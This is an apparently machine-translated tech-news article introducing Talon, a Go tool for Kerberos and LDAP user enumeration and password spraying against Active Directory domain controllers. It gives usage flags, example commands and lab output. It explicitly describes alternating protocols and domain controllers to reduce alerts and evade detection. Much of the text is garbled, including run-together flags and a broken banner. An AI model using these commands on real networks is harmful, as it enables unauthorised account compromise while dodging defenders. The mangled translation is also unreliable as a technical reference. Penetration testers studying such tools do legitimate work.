Shulou(Shulou.com)05/31 Report--

For Kerberos and LDAP service password blasting tool Talon is how, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain for you in detail, people with this need can come to learn, I hope you can gain something.

Talon

Talon is a password blasting tool for Kerberos and LDAP services that performs automated password blasting attacks while remaining undetectable. Talon can enumerate the list of Kerberos users and identify valid user roles. In addition, Talon can also perform password blasting attacks against Kerberos and LDAP Secure services. Talon can use one or more domain controllers to perform these attacks and can randomize requests between domain controllers and services (Kerberos or LDAP Secure).

Tool download

Researchers can visit the Releases page of the project to download the Talon of the corresponding operating system architecture.

The tool uses $. / Talon-hUsage of. / Talon:-D string Fully qualified domain to use-E Enumerates which users are valid-H string Domain controller to connect to-Hostfile string File containing the list of domain controllers to connect to-K Test against Kerberos only-L Test against LDAP only-O string File to append the results to-P string Password to use-U string Username to authenticate as-Userfile string File containing the list of usernames- Debug Print debug statements-sleep float Time inbetween attempts (default 0.5) enumeration mode

The user enumeration mode can be executed using the-E option, where the Talon only sends an Kerberos TGT pre-authentication request to the target KDC, but this request currently uses an unsupported encryption type. Talon will examine the response information returned by KDC and determine whether it contains KDC_ERR_ETYPE_NOSUPP (indicating that the user exists) or DC_ERR_C_PRINCIPAL_UNKNOWN (indicating that the user does not exist). Talon can perform this type of enumeration for multiple domain controllers in the target enterprise, using the-Hostfile command to specify multiple domain controllers or-H to specify a single domain controller. This technology does not trigger login failures, so it does not lock any user accounts.

. / Talon-D STARLABS.LOCAL-Hostfile DCs-Userfile Users-sleep 1-E _ |\ _\\ _\ |\ _\ |\ _\\ | _\ _\\ \ |\\\ |\\\ _\ _\\\ _ _\\\ \ _ _\ | _ _ |\ | _ |\ | _ _ | (@ Tyl0us) [-] 172.16. 144.195 STARLABS.LOCAL\ asmith: = User Does Not Exist [+] 172.16.144.185 STARLABS.LOCAL\ ballen: = User Exist [-] 172.16.144.186 STARLABS.LOCAL\ bjohnson: = User Does Not Exist [-] 172.16.144.195 STARLABS.LOCAL\ bwayne: = User Does Not Exist [+] 172.16.144.195 STARLABS.LOCAL\ csnow: = User Exist [-] 172.16.144.186 STARLABS.LOCAL\ jtodd: = User Does Not Exist [+] 172.16.144.186 STARLABS.LOCAL\ hwells: = User Exist [-] 172.16.144.186 STARLABS.LOCAL\ wwest: = User's Account Locked automatic password blasting mode

Talon is aimed at Kerberos and LDAP, both of which are integrated into the active Directory AD for authentication. Talon can split cryptographic attack traffic between the two protocols by alternately performing cryptographic blow-up attacks between the two services. This splits the number of potential events generated, reducing the chance of issuing an alert. Talon goes a step further by using-Hostfile to distribute password attacks to multiple domain controllers in the enterprise, alternating between LDAP and Kerberos each time, to create an additional layer of ambiguity. If desired, you can use the-H command to provide a single domain controller.

. / Talon-D STARLABS.LOCAL-Hostfile DCs-Userfile ValidUsers-P "Not3vil"-sleep 1 _ \\ |\\\ |\\ _\\ _\\\ _ _\\\ \\ _ _\ | _ _ | (@ Tyl0us) [-] 172.16.144.186 STARLABS.LOCAL\ admin:Not3vil = Failed [-] 172.16.144.185 STARLABS.LOCAL\ ballen:Not3vil = Failed [-] 172.16.144.195 STARLABS.LOCAL\ cramon:Not3vil = Failed [+] 172.16.144.185 STARLABS.LOCAL\ hwells:Not3vil = Success [-] 172.16.144.195 STARLABS.LOCAL\ ssmith:Not3vil = Failed

Talon can also use the-K option or the-L option to queue up for Kerberos or LDAP to perform penetration attacks.

In addition, Talon can also use Kerberos and LDAP to read the response information during a password burst attack. Talon can detect account locking by reading the response code returned by each password request attempt during a password cracking attack, which will help us prevent account locking during testing on the enterprise's internal network to avoid detection.

Root@kali:~#. / Talon-Hostfile DCs-Userfile ValidUsers-D STARLABS.local-P "Password!"-sleep 2 _ |\ _\\ _\ |\ _\ |\ _\\ | _\ _\\\ |\\\ |\\\ _\\\ _\\\ \\ _ _\ | _ _ | ( @ Tyl0us) [-] 172.16.144.186 STARLABS.LOCAL\ ballen:Password! = Failed [-] 172.16.144.185 STARLABS.LOCAL\ csnow:Password! = Failed [-] 172.16.144.186 STARLABS.LOCAL\ wwest:Password! = User's Account Locked [*] Account lock out detected-Do you want to continue. [yAdministration]: code contribution

Talon is based on Golang development. If you want to contribute your own code, please first clone the project code base locally. Before compiling Talon, we also need to install the corresponding dependent components. Run the following command first:

Go get github.com/fatih/colorgo get gopkg.in/jcmturner/gokrb5.v7/clientgo get gopkg.in/jcmturner/gokrb5.v7/configgo get gopkg.in/jcmturner/gokrb5.v7/iana/etypeIDgo get gopkg.in/ldap.v2

Next, run the following command to implement the project build:

Is it helpful for go build Talon.go to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.